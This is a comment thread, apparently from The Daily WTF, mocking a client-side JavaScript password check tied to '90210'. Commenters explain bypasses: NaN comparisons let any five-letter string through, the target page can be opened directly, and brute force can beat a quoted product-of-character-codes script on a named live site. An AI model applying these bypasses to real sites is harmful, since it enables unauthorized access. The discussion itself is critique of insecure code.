• Anonymous Coward (unregistered)

    [Y]

  • (cs)

    You gotta have all your bases covered.  What happens when 90210 no longer has a length of five?  Then you're screwed!

    What I really don't get is:

    var pass = dataform.pass.value;

    Is called twice. I wonder why they did that?

  • MrMe (unregistered) in reply to Ytram
    Ytram:
    You gotta have all your bases covered.  What happens when 90120 no longer has a length of five?  Then you're screwed!

    What I really don't get is:

    var pass = dataform.pass.value;

    Is called twice. I wonder why they did that?


     

    I can see the code being just the portion (if pass==9002) {} and then a junior developer being requested to add most specific error messages such as "Password Required" and "Incorrect Password"... hence copy+paste without understanding

  • (cs) in reply to Anonymous Coward
    Anonymous Coward:

    Subject: First Post
    [Y]



    Hurray.  You're the first poster to the thread.  What do you get?

    Oh that's right, absolutely nothing.
  • (cs)

    <SARCASM>Well, if you're gonna go to that much trouble to make sure they put in exactly 90210 then why not just tell them the password on the page and say something like "You must enter 90210 or access will be denied"?</SARCASM>

  • MrMe (unregistered) in reply to Ken Nipper

    I'm just surprised the password wasn't "13373"

  • MrMe (unregistered)

    Alex Papadimoulis:


      if (pass = 90210){
        return true;
      }

    }

     

    If pass = 90210??? looks like an assignment rather than a comparison to me!

  • Matt (unregistered) in reply to Ken Nipper

    I've got it. They forgot this code:

     if (pass != 90210) {
    alert("wrong password");
    dataform.pass.focus();
    return false;
    }

  • BereaBorn (unregistered)

    Yeah, that's a popular password here...but hopefully this validation is not quite so popular...

  • James Baker (unregistered)
    Alex Papadimoulis:


    if (pass = 90210){
    return true;
    }



    So after all that checking, it then returns true anyway. Oldest mistake in the book!
  • Gary (unregistered) in reply to James Baker
    Anonymous:
    Alex Papadimoulis:


    if (pass = 90210){
    return true;
    }



    So after all that checking, it then returns true anyway. Oldest mistake in the book!


    And that explains the code. Some newbie couldn't figure out why it always let people in, even with the wrong password. So they added all the "wrong" conditions rather than figuring out how to type an extra "=".

    Time to raise the old "paid by the line" argument again?
  • epsalon (unregistered) in reply to James Baker
    Anonymous:
    Alex Papadimoulis:


    if (pass = 90210){
    return true;
    }



    So after all that checking, it then returns true anyway. Oldest mistake in the book!


    No it doesn't because of the checks before. My guess is that the "developer" didn't spot this error, and was puzzled why access was granted when he wanted to deny. So, he started adding the checks in the start, until it finally worked.
  • blasterz (unregistered) in reply to James Baker

    Not quite. It has to pass through the oh-so-intimidating gauntlet of not being less than or greater to 90210, and having a length of 5. It does do an assignment, but it has to be 90210 by that point anyway.

  • khoker (unregistered)

    The tradegy here is that this is Javascript. Shaun didn't read the source for the answer, he literally did View -> Page Source to get the password.

    I'm also guessing this was maybe an ASP developer as the solution seems pretty straight forward if you don't know you can use != or ==

  • (cs)

    They forgot:

      if (pass == "Password" ) {
        alert("We're not [quite] that dumb!");
        dataform.pass.focus();
        return false;
      }

  • (cs)

    I saw somebody get into this page with a password of ***** (they didn't know I was watching, ha ha)

  • coward (unregistered) in reply to Maurits

    A real consultant would write the code the following way (for job security):

    if pass == 0 return false
    if pass == 1 return false
    .
    .
    if pass == 90210 return true
    if pass == 90211 return false
    if pass == 90212 return false
    .
    .
    to infinity.


  • MrMe (unregistered) in reply to Maurits

     not being a javascript guru myself I'm assuming that the line if (pass > 40017) will generate an error if the user entered in a five digit alpha string, as it would try and convert the string to an integer to compare against the value of 40017?

  • (cs)

    According to bad 80's computer-related movies, all I have to do is type "override password" to get around such high-level security measures.

  • WaterBreath (unregistered) in reply to MrMe

    I'm not a javascript guru either, but I like your suggestion better than most others posted.

    My initial thought was that it would prevent the hexadecimal or octal formats of the number ("9C51" or "116 121") from being accepted as valid...  But odds are good either javacript doesn't offer that type of auto-conversion, or it's giving the developer more credit than they deserve.

  • (cs) in reply to MrMe
    Anonymous:
     not being a javascript guru myself I'm assuming that the line if (pass > 40017) will generate an error if the user entered in a five digit alpha string, as it would try and convert the string to an integer to compare against the value of 40017?


    > forces a numeric context on both sides.

    If the "pass" variable contains a non-numeric string, numeric context will interpret it as NaN ("not a number")

    NaN > 40017 is false
    NaN < 40017 is also false
    NaN == NaN is false as well
  • (cs) in reply to Maurits

    So... taking everything into account... this code is STILL BROKEN

    "90210" will work, as it should
    "90209" and "90211" will fail, as they should
    But ANY five-character password that numifies to NaN will also work, which is an error.

  • Alex (unregistered)

    You're all missing the big question here -  Is viewing the page source to obtain the password a violation of the DMCA?

  • (cs) in reply to MrMe
    Anonymous:
     not being a javascript guru myself I'm assuming that the line if (pass > 40017) will generate an error if the user entered in a five digit alpha string, as it would try and convert the string to an integer to compare against the value of 40017?


    Not quite generating an error... IIRC in javascript (string > number) or vice versa will always be false. So for this rather complex password system, any 5-character alphabetic string will be accepted.

    (Just checked with the javascript console in firefox, and this code apparently does consider "hello" to be the correct password)
  • shim (unregistered) in reply to MrMe
    Anonymous:
    I'm just surprised the password wasn't "13373"


    Because normally it's "3l337." :)
  • (cs)

    So if someone enters "abcde" as a password it lets you in because it makes it through all the preliminary ifs and then the = vs == bug kicks in?

     

     

  • Matt Brantly (unregistered) in reply to Alex
    Anonymous:
    You're all missing the big question here -  Is viewing the page source to obtain the password a violation of the DMCA?


    Rue the day something like THAT goes to court.
  • (cs)

    i once saw some similar js in a "are you a good hacker" series.

  • (cs)

    Quite a few adult sites had these genious JS passwd protections back in the good old days. It was actually quite fun just surf around different sites to find out what they had tried out. Oh boy the amount of free quality porn

  • Chris McKenzie (unregistered)

    Leaving aside the fact that this code was available in the "View Source," it's apparent that the programmer wrote the if (pass = 90210) block first.  He's using an assignment operator instead of the compare operator.

    I imagine that his initial tests allowed any password through because his if-block always returned true. Then, instead of discovering that he had an invalid operation in his if-block, he wrote the other tests to systematically filter out bad passwords.

    All I can say is ... wow!

  • (cs) in reply to Chris McKenzie

    its a guessing game. They should have messages like "Ooh, nice try" or "try again, maybe a little lower."

    Better, levenstein (sp?) distances comparing the password to the entered data, and to the last entered attempt, so the program could reply with "getting warmer...colder...warmer..."

  • (cs) in reply to OneFactor

    OneFactor:
    So if someone enters "abcde" as a password it lets you in because it makes it through all the preliminary ifs and then the = vs == bug kicks in?

    No, "abcde" would evaluate to zero, and 0 < 90210, so it'd fail.

    The code seems to work, albeit it stupidly.

  • (cs) in reply to Otto
    Otto:

    OneFactor:
    So if someone enters "abcde" as a password it lets you in because it makes it through all the preliminary ifs and then the = vs == bug kicks in?

    No, "abcde" would evaluate to zero, and 0 < 90210, so it'd fail.

    The code seems to work, albeit it stupidly.

    Nevermind. I forgot that string comparisons to numbers are always false.

    Any 5 character string would work.

  • Student (unregistered)

    I guess the second var pass = dataform.pass.value; was purely written out of frustration because he thought maybe the pass variable has magically changed to the correct password.
    I also have a tendency to write random obsolete code when I'm getting frustrated on a problem late at night, just so I can get the code to work.

  • (cs)

    And they congratulate you for remembering it!

  • (cs)

    A Wizard A True Star:
    It's the zip code below the link. And in case you still can't remember it, they bolded it!

    <FONT face="Courier New" size=2>what's with all the other crazy javascript when you do a view source?</FONT>

  • (cs)

    Did anyone report this vulnerability to Bugtraq or the vulnerable site before publishing a working exploit?

  • Betty (unregistered) in reply to emptyset
    emptyset:
    <font face="Courier New" size="2">what's with all the other crazy javascript when you do a view source?</font>


    'Clever' obfuscation?
  • (cs)

    WTF... ! -_-

  • (cs) in reply to Wire

    Wire:
    Did anyone report this vulnerability to Bugtraq or the vulnerable site before publishing a working exploit?

    It would appear so, or someone else checked it. The code's been changed to something a *little* more obscure.  But the password still works!

  • (cs) in reply to bugsRus

    Bob Hammer (Hammer Production Company) should become security consultant. He improved the code. The password is not right there in the code anymore, instead it uses some freak numerology now. Beautiful.

    You know, someone should build an http server that can ask for a password for certain parts of your site. I'd PAY for that! And they also should somehow encrypt the traffic so that your passwords can't be sniffed.

    Oh wait, we can LEVERAGE the client's JAVASCRIPT CAPABILTIES for that!

    P.S.:

    CSIsW3CDOM = ((document.getElementById) && !(IsIE()&&CSBVers<6)) ? true : false;

    <font size="4">P.S.2:</font>
    <font size="4"> var lpass=(pass.length)+1
    for (l=1; l<lpass; l++){
    K[l]=pass.charAt(l)
    } </font>
    <font size="4">this is like saying:</font>
    <font size="4"> K=pass</font>
    <font size="4">right? BRILLANT! Where can I hire this guy?</font>

  • JoeJoe (unregistered) in reply to joost

    I can just hear the dev saying: "It's server side, see? The page sits on a server!"

  • (cs)
  • (cs)

    Go here for a more sophisticated version of this wtf

    http://www.paidsurveysonline.com/


    Its obviously a scam site, but check out the source for memberaccess......
    http://www.paidsurveysonline.com/membersaccess.html

    So there's just one password, and you'd just have to write a quick brute force program to start multiplying characters of strings together until you go that number.

    As a side note, this site is advertised here on wtf, is it perhaps put there by google for wtfness?

    //Encrypted Password script- By Rob Heslop
    //Script featured on Dynamic Drive
    //Visit http://www.dynamicdrive.com


    function submitentry(){
    password = document.password1.password2.value.toLowerCase()
    username = document.password1.username2.value.toLowerCase()
    passcode = 1
    usercode = 1
    for(i = 0; i < password.length; i++) {
    passcode *= password.charCodeAt(i);
    }
    for(x = 0; x < username.length; x++) {
    usercode *= username.charCodeAt(x);
    }
    //CHANGE THE NUMBERS BELOW TO REFLECT YOUR USERNAME/PASSWORD
    if(usercode==2.90171130144904e+22&&passcode==24386094146700)
    //CHANGE THE NUMBERS ABOVE TO REFLECT YOUR USERNAME/PASSWORD
    {
    window.location=password+".htm"}
    else{
    alert("password/username combination wrong")}
    }   

  • (cs)
    [user="A Wizard A True Star"]

    Oh. My. God.

    It's the zip code below the link. And in case you still can't remember it, they bolded it!

     

    Oh, come on. The real WTF here is that the target page is not protected whatsover. You can just copy&paste its URL in the address box and hit return to open it. Very usable.

    Ever seen a website where index.html will ask for a password, but all other pages will be ass-wide open? Including directory listing of directories with no index.html?

    Or the frameset page asks for a password, but the pages inside the frameset can be accessed directly?

  • (cs) in reply to Filthysock
    Filthysock:

    Go here for a more sophisticated version of this wtf

    http://www.paidsurveysonline.com/


    ...

    //Encrypted Password script- By Rob Heslop
    //Script featured on Dynamic Drive
    //Visit http://www.dynamicdrive.com

    ...

    for(i = 0; i < password.length; i++) {
    passcode *= password.charCodeAt(i);
    }
    for(x = 0; x < username.length; x++) {
    usercode *= username.charCodeAt(x);
    }

    ...


    Ahh they need to optimise the for loop so that the dont have to calculate the string length in each loop.

    for(i = 0,iLen=password.length; i < iLen; i++) {
    passcode *= password.charCodeAt(i);
    }
    for(x = 0,xLen=username.length; x < xLen; x++) {
    usercode *= username.charCodeAt(x);
    }


    There that fixed it.

  • (cs) in reply to joost

    Not quite. Because of his less than complete understanding of the way arrays work the first character of pass will be dropped when being transferred into K. Therefore any character followed by 4017 will result in an authenticated password. Unfortunately the redirection mechanism is

    location.href=pass+".html";

    so you won't go to the right page if you give it an "incorrect" password even though it verified it.

    Good fun.

  • (cs) in reply to joost
    joost:
    Bob Hammer (Hammer Production Company) should become security consultant. He improved the code. The password is not right there in the code anymore, instead it uses some freak numerology now. Beautiful.

    You know, someone should build an http server that can ask for a password for certain parts of your site. I'd PAY for that! And they also should somehow encrypt the traffic so that your passwords can't be sniffed.

    Oh wait, we can LEVERAGE the client's JAVASCRIPT CAPABILTIES for that!

    P.S.:

    CSIsW3CDOM = ((document.getElementById) && !(IsIE()&&CSBVers<6)) ? true : false;
    <font size="4">P.S.2:</font>
    <font size="4"> var lpass=(pass.length)+1
    for (l=1; l<lpass ;="" l="">
    K[l]=pass.charAt(l)
    } </lpass></font>
    <font size="4">this is like saying:</font>
    <font size="4"> K=pass</font>
    <font size="4">right? BRILLANT! Where can I hire this guy?</font>



    My previous post was in reference to this post...
  • tim (unregistered) in reply to coward
    Anonymous:
    A real consultant would write the code the following way (for job security):
    if pass == 0 return false
    if pass == 1 return false
    .
    .
    if pass == 90210 return true
    if pass == 90211 return false
    if pass == 90212 return false
    .
    .
    to infinity.


    LOL - wait for it, it will be tomorrows WTF I'm sure... and for job security? Because if they wanted to change the password from 90210 to, say, 90201 then he would have to be employed again long enough to change the true's and falses...
  • vhawk (unregistered)

    C'mon, you are joking .  Not even a first year CS student can be this obviously stupid. Who QA'ed this code - he should be joining the programmer for Code Security Concepts 101

Leave a comment on “Window Decal Security”

Log In or post as a guest

Replying to comment #:

« Return to Article